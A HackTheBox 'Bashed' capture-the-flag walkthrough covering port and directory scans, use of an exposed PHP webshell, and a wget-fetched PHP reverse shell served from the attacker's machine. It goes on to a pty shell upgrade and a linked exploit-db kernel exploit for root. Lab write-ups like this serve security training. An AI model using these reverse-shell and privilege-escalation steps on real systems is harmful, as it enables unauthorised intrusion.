HackTheBox - Bashed Writeup

tags: writeup HackTheBox Bashed Easy kernel exploit

✅ Enumeration

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Port Scanning

We can see that we only have a webserver up, so it's time to bruteforce subdirectories and look into the web.

# Nmap 7.92 scan initiated Mon Apr 18 11:35:37 2022 as: nmap -sV -T4 -sS -sC -v -p- -oN Ports 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.056s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 18 11:36:03 2022 -- 1 IP address (1 host up) scanned in 25.42 seconds

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Subdirectories Enumeration

We use ffuf to bruteforce subdirectories on the active web, remember to use differents dictionaries and fuzz different times to avoid errors.

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.68/FUZZ -fc 404 -t 100 -e=php,txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.68/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : php txt 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 100
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response status: 404
________________________________________________

uploads                 [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 44ms]
php                     [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 2791ms]
php                     [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 43ms]
images                  [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 4812ms]
css                     [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 43ms]
                        [Status: 200, Size: 7743, Words: 2956, Lines: 162, Duration: 5837ms]
dev                     [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 43ms]
js                      [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 46ms]
fonts                   [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 42ms]
php                     [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 44ms]

If we enter in the web we could see this:

After enumerate we can see that the web is about a php webshell and if we enter to the /dev subdirectory we see this two webshells, the standard and the one-line webshell:

After execute one of these we can start the explotation.

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Explotation

Inside the webshell we see this:

We have the www-data user and we can obtain the user flag simply digging in the home directory.

It's time to upgrade the shell and search the way to privesc.

If we try to execute some php script or netcat reverse to our local machine it won't work so we have to upload a reverse shell, in this case i use the pentest monkey php-reverse-shell located in /usr/share/webshells/php/ and to upload it to the target machine we set-up a local webserver with python.

python3 -m http.server 80

After that inside the webshell, go to /uploads and download it with wget.

wget http://10.10.10.10/reverse.php

Start a netcat listener with the same port configured on the php reverse and load the page:

After that we receive the reverse on the terminal:

We upgrade the reverse with python:

python -c 'import pty; pty.spawn("/bin/bash")'

After that we should have a stable reverse shell with the user www-data now it's time to privesc.

⏫ Root Privesc

First, i upload a copy of LinPEAS.sh using the same method as above downloading from the github repository.

https://github.com/carlospolop/PEASS-ng/releases/download/20220417/linpeas.sh

And after running it we should see some recommended exploits , but in my case i used the third of these:
https://www.exploit-db.com/exploits/45010

Only you have to download it on your machine compile it and upload it to the target using the http server technique to transfer it.

Then execute it and you should have a fully root shell:

Conclusions

It's important to update the kernel of the system to avoid easy and critical kernel exploits that could make an attacker to obtain full access without many headaches.

You can find me on: